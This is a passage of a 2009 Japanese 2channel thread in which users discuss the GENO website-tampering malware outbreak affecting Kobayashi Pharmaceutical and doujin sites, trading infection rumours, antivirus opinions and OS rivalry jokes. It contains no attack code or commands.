とりあえずボカロとか東方とかのサイト回ってるヲタは注意しろ
感染率がひどいことになってる
153名無しさん@九周年:2009/05/17(日) 20:35:00 ID:BsNSfoiOO
どうせ感染したんだしと意図的にバラまいてるやつもいるみたいだぞ
154名無しさん@九周年:2009/05/17(日) 20:36:48 ID:a2Z8mJkF0
なあに、かえって免疫力がつく
155名無しさん@九周年:2009/05/17(日) 20:36:48 ID:Jz14ghBH0
国民には冷静な対応をお願いしたい。
156名無しさん@九周年:2009/05/17(日) 20:38:04 ID:We5mkVjl0
Vistaを買わせたいMSの陰謀です
157名無しさん@九周年:2009/05/17(日) 20:45:00 ID:RYBeSkNZO
ここ数日使ってないネットブックを立ち上げたら
ウイルスバスターがいないと言われて
再起動したらブルーだったけど
大丈夫だよな
158名無しさん@九周年:2009/05/17(日) 20:46:24 ID:5mWQGV880
改竄
159名無しさん@九周年:2009/05/17(日) 20:49:21 ID:sMo+lYPKO
>>150
なるほど、ありがとう。
ネット繋がってない我が家は最強ですね。
160名無しさん@九周年:2009/05/17(日) 20:50:01 ID:rPTid9Oo0
cmd.exe試したけど大丈夫だった・・

しかしこわくてどのサイトにもいけんな
マカフィー期限切れそうだし

オススメのフリーセキュリティソフトあったら教えてくれ
161名無しさん@九周年:2009/05/17(日) 20:50:36 ID:DUwAL1gx0
ネットをすればGENOウィルスに感染し、外に出れば豚インフル
162名無しさん@九周年:2009/05/17(日) 20:50:45 ID:agKyD87CP
これすごく感染危険度が高いんだが・・・

このスレタイじゃ「関係ないや」って見もしない奴が大半だろうな。
163名無しさん@九周年:2009/05/17(日) 20:51:04 ID:Db0i393p0
ニュー速+たつのが1日はおくれとる
おせ〜
164名無しさん@九周年:2009/05/17(日) 20:51:36 ID:We5mkVjl0
http://tsushima.2ch.net/test/read.cgi/newsplus/1242193515/681

もう一回依頼しといたけど無視される気がする
165名無しさん@九周年:2009/05/17(日) 20:52:15 ID:n8mFfwBF0
>>160
貧乏人乙w
フリーなんて言っているようではダメダメだな
166名無しさん@九周年:2009/05/17(日) 20:53:01 ID:t0A5+4zC0
インターネットって怖いですねぇ
安心して見る事もできないんですねぇ
やはりテレビを見ているのが一番安心のようですね^^





なーんていう風になるといいですね!マスゴミさん
167名無しさん@九周年:2009/05/17(日) 20:53:29 ID:RkuI9rV60
>>132
デマっつーか、単にnifにホムペ開設してた子がウィルスにやられたんじゃね?
で、ftpでホムペのページ更新したとたんにftpのパスワードをサクッと盗まれて
外部からindex.html改竄されたんだろうね。
自分は悪くない!と思ってるからNifのサーバがやられたに違いない!ってファビョったんだろwバカスww
168名無しさん@九周年:2009/05/17(日) 20:54:21 ID:spcZi1BU0
>>1
+板、スレ立つのおっそ〜〜www

セキュリティ板やν速無印じゃとっくに話題になってるぞ
169名無しさん@九周年:2009/05/17(日) 20:54:59 ID:ieeYRilW0
コンピュータウィルスだけは体がやられるわけじゃないから過剰に騒ぐ必要なし。
ソフト屋に勝手に騒がせておけばいい。

セキュリティソフトを一度も使わず12年の俺が言ってみる。
170名無しさん@九周年:2009/05/17(日) 20:55:09 ID:dg3Mksro0
>>160
今のところavast!はこのウイルス探知できるらしい
でも亜種も出てるからどのウイルスソフトもアウアウだと思っといたほうがいい
171名無しさん@九周年:2009/05/17(日) 20:55:48 ID:8MKXC816O
小林製薬の糸ち○こ
172名無しさん@九周年:2009/05/17(日) 20:56:15 ID:JxPoByre0


>たしかにMacもOS9以前はシングルユーザーのOSだったから、デスクトップ上で起こった
>こと=システム全体に即影響で深刻なウイルスもあったが、OS XでマルチユーザーのUNIX
>になったことでシステムに勝手に変更を加えるようなウイスルは一切シャットアウトでき
>るようになった。
>
>恐ろしいのは、XPはデフォルトのユーザーが管理者権限のため実行上はシングルユーザー
>のOS9以前と同じ状況だということ。
>Windowsばかりウイルスが蔓延するのはそういう理由。

173名無しさん@九周年:2009/05/17(日) 20:56:42 ID:buzMpw6xO
東方、ボカロの大手サイトも感染してるからな
お前ら大丈夫か?
感染サイト踏んだらアウトだぞ?
174名無しさん@九周年:2009/05/17(日) 20:56:56 ID:WMkb13sV0
>>133
ウイルスに感染してる場合cmd.exe(コマンドプロント)で
DOS窓開けると重症化するんじゃないの?心配だなあ
175名無しさん@九周年:2009/05/17(日) 20:57:55 ID:vpzlU4qK0
これ↓か。なんで今さらスレが立つんだ?



弊社サイトの改ざんに関するお詫びとご説明?

差出人: 【小林製薬】暮らしのヒントお知らせ隊 ([email protected])
送信日時: 2009年5月13日 10:20:26
宛先: ●●●@hotmail.com

いつも「暮らしのヒントお知らせ隊」メールマガジンをご愛読いただき誠にありがとうございます。
この度、弊社サイトの一部(「暮らしのヒントお知らせ隊」含む)において第三者による改ざんが確認され、
当該期間に下記サイトを閲覧された方にウイルス感染の恐れがあることが判明いたしました。
■閲覧により感染した可能性のある期間 5月10日(日)20時23分 〜 5月11日(月)21時27分
■改ざんされたサイト ・暮らしのヒントお知らせ隊 ・ハナノア ブランドサイト ・イージーファイバー ブランドサイト
上記期間に当該サイトにアクセスされた皆様におかれましては、誠にお手数ではございますが、
下記URLにて対応をご確認下さい。 http://www.kobayashi.co.jp/info/090512.html
平素から弊社サイトをご覧いただいている皆様にご迷惑をおかけしましたこと、心よりお詫び申し上げます。
引き続きサイトの安全管理には万全を尽くしてまいりますので、今後ともよろしくお願い申し上げます。
――発行―――――――――――――――――――――――――――――
「暮らしのヒントお知らせ隊」メルマガ会員対応係 ・お問い合わせは下記まで
https://hint2.kobayashi.co.jp/webapp/hear/org/showEnquete.do?enqueteid=12&clientid=10034&databaseid=yvo
176名無しさん@九周年:2009/05/17(日) 20:58:12 ID:dg3Mksro0
国交省整備局のHPがウイルスに感染!!

ってタイトルだったらもうちょっと食いついてたかな
177名無しさん@九周年:2009/05/17(日) 20:58:22 ID:spcZi1BU0

【ネットでも】GENOウィルス亜種が爆発的に増殖か 小林製薬や同人サイト他中心に感染も★5【新型ウィルス拡散中】
http://tsushima.2ch.net/test/read.cgi/news/1242555395/

・小林製薬【対策済】
・BIG-server.com【対策済】  ←2chの鯖屋
・ウェルネス(医療情報提供企業)【対策済】
・薬事日報社【対策済】
・国交省中部地方整備局岐阜国道事務所【対策済】
・全日本民医連【対策済】
・総合ホビー展示即売会「ホビコン」【対策済】
・GENO(PC通販ショップ)【キャッシュ削除済】   ← このバカショップが蔓延させた
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
・NHT紀尾井町グループ(自毛植毛斡旋企業)【対策済】
・SayMove!【対策済】
・ライブハウス「あさがやドラム」【対策済】
178名無しさん@九周年:2009/05/17(日) 20:58:48 ID:PsfeFnLu0
>>169
ニートさんですか?
会社のPCがやられてしまうと企業にとってはダメージなんですよ、知ってました?
179名無しさん@九周年:2009/05/17(日) 20:59:44 ID:rJNesMVKO
そのウイルス、人にも感染しますか?
180名無しさん@九周年:2009/05/17(日) 20:59:49 ID:AgjuC7ne0
>>157
再起動してブルーバックは感染しとる。

ノートン先生だのは反応しないので、チェックして安心と思っているやつは気をつけろ。
>>133の確認を忘れるな。
181名無しさん@九周年:2009/05/17(日) 21:01:22 ID:AgjuC7ne0
>>174
重症もなにも、感染した時点でオワリだから、関係ないんじゃないかな。
どっちにしたってクリーンインストールしか対処方法がない。
182名無しさん@九周年:2009/05/17(日) 21:02:27 ID:ZxOtT8x60
sqlsodbc.chmがそもそも存在しねえぞ
183名無しさん@九周年:2009/05/17(日) 21:02:31 ID:We5mkVjl0
>>177
このリストだけ見てると大して広がってないように見えるよなー
実際に報告されてるサイトだけで100件以上あるわけだが
184名無しさん@九周年:2009/05/17(日) 21:04:26 ID:JxPoByre0

つーか、いい加減Windowsでネットは禁止にしろや。。

185名無しさん@九周年:2009/05/17(日) 21:05:39 ID:8YIZhwe60
>>38
マンコかゆくない
女性器かゆくない
186名無しさん@九周年:2009/05/17(日) 21:07:50 ID:RYBeSkNZO
>>180
Thanks
いや昨日確かめて立ち上がるし、ファイルサイズも変わってないんだが
やっぱり亜種かな
187名無しさん@九周年:2009/05/17(日) 21:10:59 ID:spcZi1BU0
>>183
正規のWebサイトに感染する新手のマルウェアが勢力を急拡大している。
2009年05月15日 08時24分 更新

5月6日〜5月13日のマルウェア報告数(Sophos調べ) 
セキュリティ企業の英Sophosは、正規のWebサイトに感染する新手のマルウェアが出現し、猛威を振るっていると伝えた。

このマルウェア「JSRedir-R」はSophosが5月初旬に発見し、その後勢力を急拡大。
5月6日から13日の1週間の統計では、Webサイトに感染している全マルウェアの42%を占める規模になり、
これまで広く出回っていた2位の「Iframe-F」(7%)を大きく引き離した。

http://image.itmedia.co.jp/l/im/news/articles/0905/15/l_malware.jpg  ← ぶっち切りwww
188名無しさん@九周年:2009/05/17(日) 21:13:04 ID:kBBbTcDe0
気付くの遅くね?
189名無しさん@九周年:2009/05/17(日) 21:13:07 ID:spcZi1BU0
190名無しさん@九周年:2009/05/17(日) 21:15:39 ID:JxPoByre0

サイトを見てるだけでウイルスに感染するというミラクル体験ができるのはWindowsだけ!(笑)

191名無しさん@九周年:2009/05/17(日) 21:16:43 ID:Kfvmxa+T0
ここにもキチガイどもが集まりつつあるようだ
192名無しさん@九周年:2009/05/17(日) 21:16:54 ID:bl+JBaka0
yarai2009の評価版まだかなぁ
あれならこういうのパターン無しで防御可能らしいんだが
193名無しさん@九周年:2009/05/17(日) 21:17:10 ID:2J0GbIiF0
>>168
腐女子板でもとっくに話題だったw
194名無しさん@九周年:2009/05/17(日) 21:18:20 ID:spcZi1BU0
>>193
そりゃ、同人サイトが感染しまくりだったからだw
当然といえば当然
195名無しさん@九周年:2009/05/17(日) 21:18:52 ID:i5KQk6/70
冷えピタン
196名無しさん@九周年:2009/05/17(日) 21:19:39 ID:We5mkVjl0
>>192
あれはヒューリスティック検知だろ
今時のアンチウィルスでヒューりっテック検知搭載してない方が珍しい
197名無しさん@九周年:2009/05/17(日) 21:21:42 ID:bl+JBaka0
>>196
普通のヒューリスティックだけじゃないお
こういう脆弱性狙った攻撃に特化したモジュールがあるの
説明聞いた俺が言うんだから間違いなし。
198名無しさん@九周年:2009/05/17(日) 21:22:24 ID:Kfvmxa+T0
可愛い腐女子に手取り足取りLinuxの使い方を教えてあげたい
199名無しさん@九周年:2009/05/17(日) 21:23:35 ID:We5mkVjl0
>>197
説明を鵜呑みにするのはお花畑の仕事だろw
200名無しさん@九周年:2009/05/17(日) 21:23:47 ID:Gz7wcEUtO
もうちょい大きく取り上げようよこれ
201名無しさん@九周年:2009/05/17(日) 21:24:40 ID:q/7KjPZU0
おれは可愛い婦女子に手取り足取りLinuxの使い方を教えて欲しい
202名無しさん@九周年:2009/05/17(日) 21:25:02 ID:F+Gf8vSu0
マックに替えて悠々とエロサイト巡り中のオイラが通りますよ・・・
203名無しさん@九周年:2009/05/17(日) 21:28:03 ID:bl+JBaka0
>>199
いやいや
キミのいう「ヒューリスティク」と考えてるのはあのソフトの一部に過ぎない
ちゃんとどういう仕組みか見たの?
204名無しさん@九周年:2009/05/17(日) 21:33:40 ID:Kfvmxa+T0
>>202
Adobe製品が問題の根本なんだからMacに変えても本質的な解決にならんだろ
205名無しさん@九周年:2009/05/17(日) 21:36:15 ID:GSOwuAeJO
こういうニューススレはsageで書いちゃいかんよ。

★2まで行けば、そのときのスレタイに
「同人サイトがパンデミック??」
とかつけておけばみんな見るだろう。

★2まで行くかな…
206名無しさん@九周年:2009/05/17(日) 21:37:33 ID:Kfvmxa+T0
そのためにはパンデミックちゃんのAAが必要だな
207名無しさん@九周年:2009/05/17(日) 21:38:54 ID:GSOwuAeJO
ageで書こうageで!
ウィルス警報発令だ!
208名無しさん@九周年:2009/05/17(日) 21:39:40 ID:O48q1Ahk0
>>204
マックというかUnix系のOSで「見ただけで感染する」なんてバカげたこと
起こりようがないからw
209名無しさん@九周年:2009/05/17(日) 21:40:24 ID:2J0GbIiF0
まとめ見たら恐くてどこも踏めないんだけど
というか、まとめすら恐くて今日は見ていないw
210名無しさん@九周年:2009/05/17(日) 21:40:51 ID:q/7KjPZU0
>>208
前例がないだけで、ありえなくはないと思う。
211名無しさん@九周年:2009/05/17(日) 21:42:06 ID:M87oDkv70
糞製薬会社
潰れちまえよ
212名無しさん@九周年:2009/05/17(日) 21:42:46 ID:4qpyO0wU0


>たしかにMacもOS9以前はシングルユーザーのOSだったから、デスクトップ上で起こった
>こと=システム全体に即影響で深刻なウイルスもあったが、OS XでマルチユーザーのUNIX
>になったことでシステムに勝手に変更を加えるようなウイスルは一切シャットアウトでき
>るようになった。
>
>恐ろしいのは、XPはデフォルトのユーザーが管理者権限のため実行上はシングルユーザー
>のOS9以前と同じ状況だということ。
>Windowsばかりウイルスが蔓延するのはそういう理由。
213名無しさん@九周年:2009/05/17(日) 21:43:17 ID:77i2/zYj0
>>198
襲えてお兄様
214名無しさん@九周年:2009/05/17(日) 21:44:30 ID:Kfvmxa+T0
>>208
UNIXでもLinuxでも起こりえる話だ
マカは愚かだな
俺はLinuxを使っていてもFlash Playerの脆弱性については常に注意を払っている
215名無しさん@九周年:2009/05/17(日) 21:45:30 ID:pt6BBBXWO
普段よりPCが熱かったり反応がだるい気がするから新型ウイルスに感染したかも!

こうですか?
216名無しさん@九周年:2009/05/17(日) 21:46:22 ID:4qpyO0wU0
>>214



・・・・・ムリw
217名無しさん@九周年:2009/05/17(日) 21:46:44 ID:oEhqDKML0
>>197
>>199


【セキュリティ】定義ファイル使わない国産ウイルス対策ソフト「yarai」、Winnyの脆弱性を発見した鵜飼裕司氏らが開発[09/05/14]
http://anchorage.2ch.net/test/read.cgi/bizplus/1242318155/100

100 名前:名刺は切らしておりまして[sage] 投稿日:2009/05/17(日) 20:28:03 ID:ccyGmsXQ
このyaraiとやらも4つのヒューリスティックエンジンと言ってるけども、記事
やHPの内容を見る限りでは、一般的なスタティック・ヒューリスティック法
の部分はスタティク分析エンジンとかいう部分じゃないかな。
SandBoxエンジンは、ダイナミック・ヒューリスティック法ってやつだと思う。
たぶんノートンがこれに近いことをやってる気がする。
HIPSエンジンとやらはどう見てもビヘイビアだろう。
カスペルスキーのプロアクティブディフェンスがこれに相当するのでは。
ZDPエンジンてのは分類が判らない。今までこういうの自体あんま無かったし。


引用終わり

そもそも100%の対策ソフトなんて存在するわけ無いんだが、
ソースネクスト製品あたりの人は、買い換えた方が無難だろうね。
あと、adobe製品のアップデートやOSのアップデートも怠らないように。
一太郎とかもだっけ?
218名無しさん@九周年:2009/05/17(日) 21:47:14 ID:pVTXe+GV0
win
mac
linux
使ってるけど一番穴の多いのはmacだよ
誰も狙わないからいまんとこ大丈夫なだけで
219名無しさん@九周年:2009/05/17(日) 21:47:22 ID:JWMdZzmj0
電脳化してる人が閲覧するとマズイよ
220名無しさん@九周年:2009/05/17(日) 21:48:20 ID:rha3tF830
     ト-- 、
     ',:::::::::::::\   __     _,,.. -‐ァ
      .〉::::::::::::::::`く´    `>''"´:::::::::::::|
     |::::::::;>─- >- 、 '"´:::::::::::::::::::::::::|
     |::/        `'<::::::::::::::::::::::::!
     /  /_ ハ    ヽ.  \:::::::::::::::::ハ
    ,|. 7 |_/`|  ト 、.__',   Y  ̄\:::|
    /|  | ァ7ヽヘ.  ! ´\_|   |、:::::::::::\    感染拡大
  ∠:::〉 |/` j_り \|ァ'Tこヽ、  ! \:::::::::::ハ
    〈/ 7""        j___ン|  ,ハ  ∧__,r┘
   <.  ト 、  l7 =‐┐ ""/ |/ //レ'´         _◎     ___
    ` ーレヘ >、.,___.ノ_,,.イヘ>::''"´7/)-‐っ  | ̄|┌┘ └┐ /ヽ |__  | [][]
         /7ト::-<::::/ /::::::::::::::::||  ` く   | /  ̄| | ̄ / /___.  //
        ,|::/.`ー‐''". !::::::::::::::::::||--.rイ   | |_ r‐┘└、/ ,-┐ |_〈 〈_
     ,..-/::7.:     : ,トァ‐-- 、_||:::::_|/  ..|__|| ()  r、」__/ .|__| \__]
  r- /::::::::::::;|\___// 〈      ̄        ̄ ̄
  と||::::::::::::/ `>-‐< く   \          | ̄|______
   ||:::::::::://       \\   >、        |_____|       /  ̄ ̄ ̄.|
    `ーァヘ.       >'"< ハ      ┌────┐     / / ̄ ̄|  |
     rヘ \\ _,,... ‐'''",. '"` 、/ |       └────| ̄|| ̄|| ̄| ̄    / /
     \ \>--‐ ''"´   //       | ̄ ̄ ̄ ̄  ̄  ̄ / /    / /
      `l<二二ニニ二ア‐ '´          ̄ ̄ ̄ ̄|_| ̄ ̄ /   / /
        `ーr-'、ノ|.|  ./                    ̄ ̄    / /
         l__.ソ,ト- /              PANDE MIC    く /
           /`‐' |
            |_ソ
221名無しさん@九周年:2009/05/17(日) 21:48:27 ID:GSOwuAeJO
常にage続けるスレ。
222名無しさん@九周年:2009/05/17(日) 21:49:30 ID:buzMpw6xO
別に同人サイトだけで流行してる訳じゃない
ゲーム公式から出版社、ペットの名付け方サイトまでやられてる
判明してないだけだ


ちなみに一番ひどかったのは、栄えある命名権獲得の
PCショップGENO
223名無しさん@九周年:2009/05/17(日) 21:49:46 ID:K8jkbOL00
外出すればトンフルに感染し
引きこもっていれば小林製薬のGENOようじに感染し

俺はもうどうしたら(´・ω・`)
224名無しさん@九周年:2009/05/17(日) 21:50:37 ID:bl+JBaka0
>>217
いいまとめだ。
これのZDPエンジンてのが脆弱性対策用なんだよね。
225名無しさん@九周年:2009/05/17(日) 21:52:47 ID:MEI0iJ4T0

こういうのってマイクロソフトに損害賠償請求できないの?
明らかにOSのアホ仕様が原因でそ。



226名無しさん@九周年:2009/05/17(日) 21:52:48 ID:GSOwuAeJO
同人サイトだけじゃないのか?
仕事でネットで調べものしても感染するのか?
そりゃヤバすぎるぞ。

スレタイに
「パンデミック??」
とか、人目を引く言葉を入れてほしかったなぁ。

ageage
227名無しさん@九周年:2009/05/17(日) 21:53:02 ID:Kfvmxa+T0
>>213
そのためにはまず濃密な肉体的接触を

>>216
Macがウィルスに強いというのは嘘だし
UNIX系OSだからウィルスに感染しないというのも嘘だ
Macはシェアが低いので狙われにくいだけで、OS Xそのものは非常に脆弱だ

Linuxでも同様にシェアが低いせいで攻撃を受けないで済んでいるという面はある
が少なくともLinuxはVistaと同等かそれ以上の保護機構は備えている
またyum/aptによるアップデートや管理の容易さはLinuxの大きな利点だ
だから私はLinuxがもっとも安全な選択肢だと信じる

愚か者はまとめてNGIDにした
こういうセキュリティ関連のスレで嘘を言って宣伝しようとするのは
実に卑怯なやりくちだ
私はこういう輩を軽蔑する
228名無しさん@九周年:2009/05/17(日) 21:53:21 ID:JYjupt9V0
>>222
キャッシュ削除すれば問題ないなんて大嘘ついた罪は重い
229名無しさん@九周年:2009/05/17(日) 21:54:16 ID:aLe7LTmx0
martuz.cnから?pdf落とそうとするのがそーなの?
230名無しさん@九周年:2009/05/17(日) 21:54:25 ID:q/7KjPZU0
そういえば、明日「先週末何してた?」って訊かれた時に
「2chに張り付いてた」とか答えたくないんだけど、なんか気の利いた回答を教えてよ。
231名無しさん@九周年:2009/05/17(日) 21:55:10 ID:81OiHRBU0
>>227
もうその手の詭弁が通用しなくなってることに気づけやw
232名無しさん@九周年:2009/05/17(日) 21:55:56 ID:Kfvmxa+T0
>>220
マッテタ!

>>230
「Steamの週末セールでCoD WaWが半額だったので買ったけどもう飽きた」
233名無しさん@九周年:2009/05/17(日) 21:56:21 ID:x8B+YKoI0
ウイルス対策の情報収集してた・・・で。。。 >>230
234名無しさん@九周年:2009/05/17(日) 22:00:04 ID:HH6PqBvv0
なんでこんなに関心がないんだ?
知らん間に自分のサイトが発信源になってるかもしれんというのに
235名無しさん@九周年:2009/05/17(日) 22:01:05 ID:44a0vSHm0
今回はavast!入れてて良かったと思う騒動だったな
小林製薬のサイトは行ってないけど
236名無しさん@九周年:2009/05/17(日) 22:01:10 ID:U6+vPg1WO
>>234
トンフルの方が命にかかわるからな
237名無しさん@九周年:2009/05/17(日) 22:03:23 ID:GSOwuAeJO
このスレタイじゃわかんないよ。

age
238名無しさん@九周年:2009/05/17(日) 22:06:31 ID:q5pOoUIs0
                 ___
                /     \
 _____      /         \
/ || ̄ ̄ ̄ ̄||  /           \  どうしてこうなった・・・
|.....||GENO... ..||  |              |
|.....||        ||   \           /
|.....||____|| ___/ / ̄ ̄ ̄ ̄ ̄ ̄ ̄/
| ̄ ̄ ̄ ̄\三(_  /           /
|        |     /           /

                 ___
                /     \
 _____   ミ.  /  ⌒  ⌒ \
/ || ̄ ̄ ̄ ̄||   /   =⊂⊃=⊂⊃=\  どうしてこうなった!?
|.....||GENO... ..||  |      (__人__)   |
|.....||        || ミ \      `ー'´   /
|.....||____|| ___/ / ̄ ̄ ̄ ̄ ̄ ̄ ̄/
| ̄ ̄ ̄ ̄\三(_  /           /
|        |     /           /

          ♪     ___
                /⌒  ⌒\ 
              /=⊂⊃=⊂⊃=\  ,⌒ヽ
 _____    _/   (__人__)   \ゝ ノ   どうしてこうなった!
/ || ̄ ̄ ̄ ̄||  ( |     |r┬-|      |  |      どうしてこうなった!
|.....||GENO. ...||  | \    `ー'´    / _ノ
|.....||        ||  └‐、            レ´`ヽ
|.....||____||    `/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄/   \  ♪
| ̄ ̄ ̄ ̄\三.    /            /ノ`ヽ,,__ノ
|        |     /            /

239名無しさん@九周年:2009/05/17(日) 22:07:26 ID:GSOwuAeJO
あげ続ける。

こんなに書き続けたら、そのうちピロシキから
2ちゃん使用料の請求書がくるかなぁ。
240名無しさん@九周年:2009/05/17(日) 22:09:33 ID:hDs5a3Mb0
企業用のウイルスバスターはこれに有効なの?
241名無しさん@九周年:2009/05/17(日) 22:09:44 ID:oZ6HUDrg0
この会社、みんなの就職活動日記でボコボコにされてた会社だw
めしうまwwww
242名無しさん@九周年:2009/05/17(日) 22:10:47 ID:Dl9D7Ns6O

マスクしてなかったの?>小林製薬
243名無しさん@九周年:2009/05/17(日) 22:11:32 ID:GSOwuAeJO
なんかウィルスの変異だか何だかが早くて
ウィルス駆除ソフトが追い付けないとか何とか。
244名無しさん@九周年:2009/05/17(日) 22:11:59 ID:PyzgRQgk0
このスレタイじゃ誰も見ない。
本来なら勢いTOPになってて良いんだが・・・
245名無しさん@九周年:2009/05/17(日) 22:12:08 ID:PyhibbPO0
GENOさんパネエっす
246名無しさん@九周年:2009/05/17(日) 22:12:54 ID:xMXoigIfO
GENOてなーに
247名無しさん@九周年:2009/05/17(日) 22:13:10 ID:ONbLLSKl0
ググっただけでもヤバいと聞いて飛んできますた
248名無しさん@九周年:2009/05/17(日) 22:13:22 ID:gnuxpBe70
この前のSay Move!と同じ奴か?
249名無しさん@九周年:2009/05/17(日) 22:14:17 ID:HH6PqBvv0
まぁスレタイ見るだけだったら小林なんていってないしおkってなるわな
価格.comの時もそうだったし
サイト持ちから更に二次感染するってのが怖いのに
250名無しさん@九周年:2009/05/17(日) 22:15:00 ID:zRSYJwG2O
小林製薬と言えばこれはもう、

「糸ようじ」

で決まりでしょう。
251名無しさん@九周年:2009/05/17(日) 22:15:07 ID:GSOwuAeJO
めっちゃエライこってす。

自分のPCの予防も大変だけど、
それより何より、
明日、職場のみんなに何て言って
忠告しようかと。



「2チャンネルで見たんだけど…!」

orz
252名無しさん@九周年:2009/05/17(日) 22:16:16 ID:Gz7wcEUtO
>>1
なんでこんなスレタイにしたのか。
これじゃまるきり小林製薬だけの問題みたいじゃん
253名無しさん@九周年:2009/05/17(日) 22:16:48 ID:WatdXLrgO
新商品「菌撃退」
254名無しさん@九周年:2009/05/17(日) 22:17:10 ID:/BuRBwBP0
怖いなあ、2ちゃんも改竄されたりして
255名無しさん@九周年:2009/05/17(日) 22:17:22 ID:s4nFNlrZP
IE以外で閲覧しても危険なのかね
256名無しさん@九周年:2009/05/17(日) 22:17:25 ID:x1i6opsm0

サイト見ただけでシステム書き換えられるとか、一体どうやったら
そんなこと出来るようになるんだよw >Windows(笑)


257名無しさん@九周年:2009/05/17(日) 22:17:31 ID:oEhqDKML0
>>240

ビジネスセキュリティなら、対応している可能性もあるが、
コーポレートエディションは、オプションをつけていないと弱いカモね。

あくまで「可能性」ですが

ウィルス対策ソフトだけでは対応しきれん。
258名無しさん@九周年:2009/05/17(日) 22:20:06 ID:ONbLLSKl0
自分で対策できない会社のPCが不安だ・・・
259名無しさん@九周年:2009/05/17(日) 22:20:20 ID:cPOd8JSp0
HDDの電源を抜いてPuppy Linuxを使えばいいのですか?
260名無しさん@九周年:2009/05/17(日) 22:20:25 ID:t5C/3fzq0
vistaは大丈夫なんですか?
261名無しさん@九周年:2009/05/17(日) 22:20:30 ID:09s1Pk4l0
小林製薬のサイトなんて生まれてこのかた閲覧したことないから
改ざんでも何でも勝手にしといてくれ
262名無しさん@九周年:2009/05/17(日) 22:21:01 ID:Yc+uvYPRO
小林製薬の
「ウイルスうつーる」
263名無しさん@九周年:2009/05/17(日) 22:21:05 ID:ywL/MaBL0
GENOの文字をタイトルに入れておいてくれー
関連スレ無いのかと思ったじゃないか
264名無しさん@九周年:2009/05/17(日) 22:22:20 ID:GSOwuAeJO
GoogleかYahoo!でニュースとしてあげといてくれれば、
同僚や上司に
「ニュースで見たんですが…!」
と言えるんだが…
265名無しさん@九周年:2009/05/17(日) 22:22:29 ID:hDs5a3Mb0
>>257
そうですか、ありがとうございます。
アクロバツトを最新に更新します。
266名無しさん@九周年:2009/05/17(日) 22:22:43 ID:oSe49aWO0
>>256
アプリの脆弱性があれば
Linuxでも可能
267名無しさん@九周年:2009/05/17(日) 22:23:06 ID:JsSjXo320
GENOはしょっちゅうウィルス蒔いてるな
何度目だコレ
268名無しさん@九周年:2009/05/17(日) 22:23:08 ID:kILeLY9IO
製薬会社がウイルス感染とは皮肉な話だが
まあ別にコンピューター用の予防薬やワクチンを作っているわけでもあるまいし
それはそれで仕方ない

まあセキュリティーソフト会社がコンピューターウイルスに感染したら
それこそ最悪のイメージダウンになってしまうが
そういえば実際にそんな事件もあったな
269名無しさん@九周年:2009/05/17(日) 22:23:22 ID:Kfvmxa+T0
>>260
UACが防いでくれる

心配する暇があったらAdobe ReaderとFlash Playerをアップデートしろよ
270名無しさん@九周年:2009/05/17(日) 22:23:38 ID:ZxOtT8x60
個人情報保護みたいなクレーマー歓喜!
のルールが無ければなあ
感染・媒介しないのがベストだが
万が一ウイルス感染してもまあ楽勝なのになあ
271名無しさん@九周年:2009/05/17(日) 22:23:48 ID:7ljK8XR20
>>257
その前にNWセキュリティとかの
パターンファイルでブロックされてる罠
272名無しさん@九周年:2009/05/17(日) 22:23:49 ID:ywL/MaBL0
191 名前:名無しさん@九周年[sage] 投稿日:2009/05/17(日) 21:16:43 ID:Kfvmxa+T0
ここにもキチガイどもが集まりつつあるようだ

198 名前:名無しさん@九周年[sage] 投稿日:2009/05/17(日) 21:22:24 ID:Kfvmxa+T0
可愛い腐女子に手取り足取りLinuxの使い方を教えてあげたい

どっちがキチガイかw
273名無しさん@九周年:2009/05/17(日) 22:23:50 ID:ONbLLSKl0
>>264
俺と同じ悩みだww
2ちゃんソースの悲しさ
274名無しさん@九周年:2009/05/17(日) 22:23:53 ID:a7cTcXoV0
また小林かよ
275名無しさん@九周年:2009/05/17(日) 22:23:54 ID:RheIUslP0
>>248
うん。
276名無しさん@九周年:2009/05/17(日) 22:24:21 ID:YptCJPrB0
>>268
>セキュリティーソフト会社がコンピューターウイルスに感染

昔どっか外国の話で聞いたような記憶が・・・
277名無しさん@九周年:2009/05/17(日) 22:24:59 ID:fw9+BmSk0
動画サイトをみたいので
java-scriptは常時OFFにできないしフラッシュプレイヤーも削除できない
GENOウィルス怖い
278名無しさん@九周年:2009/05/17(日) 22:25:14 ID:GSOwuAeJO

・ウィルスの通称
・現在爆発感染中
・ウィルス対策ソフトでは駆除しきれない
・感染したらPC初期化しか手はない

この情報のどれか一つくらいは
スレタイに入れてほしかったな。
279名無しさん@九周年:2009/05/17(日) 22:25:55 ID:FT+GLbIo0
ウイルスに感染したら薬を飲めというメッセージを自ら示したんだろ?
280名無しさん@九周年:2009/05/17(日) 22:26:01 ID:6uNK4CGD0
さっき知って慌てて自分のサイト確認したぜ・・・
感染してないようでよかったが…
281名無しさん@九周年:2009/05/17(日) 22:26:17 ID:Kfvmxa+T0
>>266
相手しないほうがいいよ
話が通じる奴じゃなさそうだ
ID変えて同じ事を九官鳥のように繰り返しレスしてる
案外こいつがウィルスの作者だったりして

>>272
腐女子に欲情したからってキチガイ扱いヒドス
282名無しさん@九周年:2009/05/17(日) 22:26:38 ID:LZAEP/n90
>>266
システムはroot権限でしか書き換えらないのに、どうして一般権限
で動いてるアプリから書き換えられるんだ?w
283名無しさん@九周年:2009/05/17(日) 22:26:44 ID:RFcYzWpW0
>>280
動ナビか?
284名無しさん@九周年:2009/05/17(日) 22:27:19 ID:wLwJdYPi0
ウィルス対策ソフトのウィルス○スターをインストールして、起動不能になることはあったね。
それとウィルスバ○ターの開発元が、ウィルスに感染したこともあったね。
285名無しさん@九周年:2009/05/17(日) 22:29:00 ID:x57JKY380


>たしかにMacもOS9以前はシングルユーザーのOSだったから、デスクトップ上で起こった
>こと=システム全体に即影響で深刻なウイルスもあったが、OS XでマルチユーザーのUNIX
>になったことでシステムに勝手に変更を加えるようなウイスルは一切シャットアウトでき
>るようになった。
>
>恐ろしいのは、XPはデフォルトのユーザーが管理者権限のため実行上はシングルユーザー
>のOS9以前と同じ状況だということ。
>Windowsばかりウイルスが蔓延するのはそういう理由。


286名無しさん@九周年:2009/05/17(日) 22:29:04 ID:0KcFOizx0
PCのウィルスが何だ!
自分の体が在ってこそのPCだろ!

【WH○】”水酸の危険性”より

・水酸 (DHMO)とは
・水酸と呼ばれ、酸性雨に含まれる成分の1つである
・温室効果により各種異常気象を引き起こす
・原子炉内で存在が確認されている
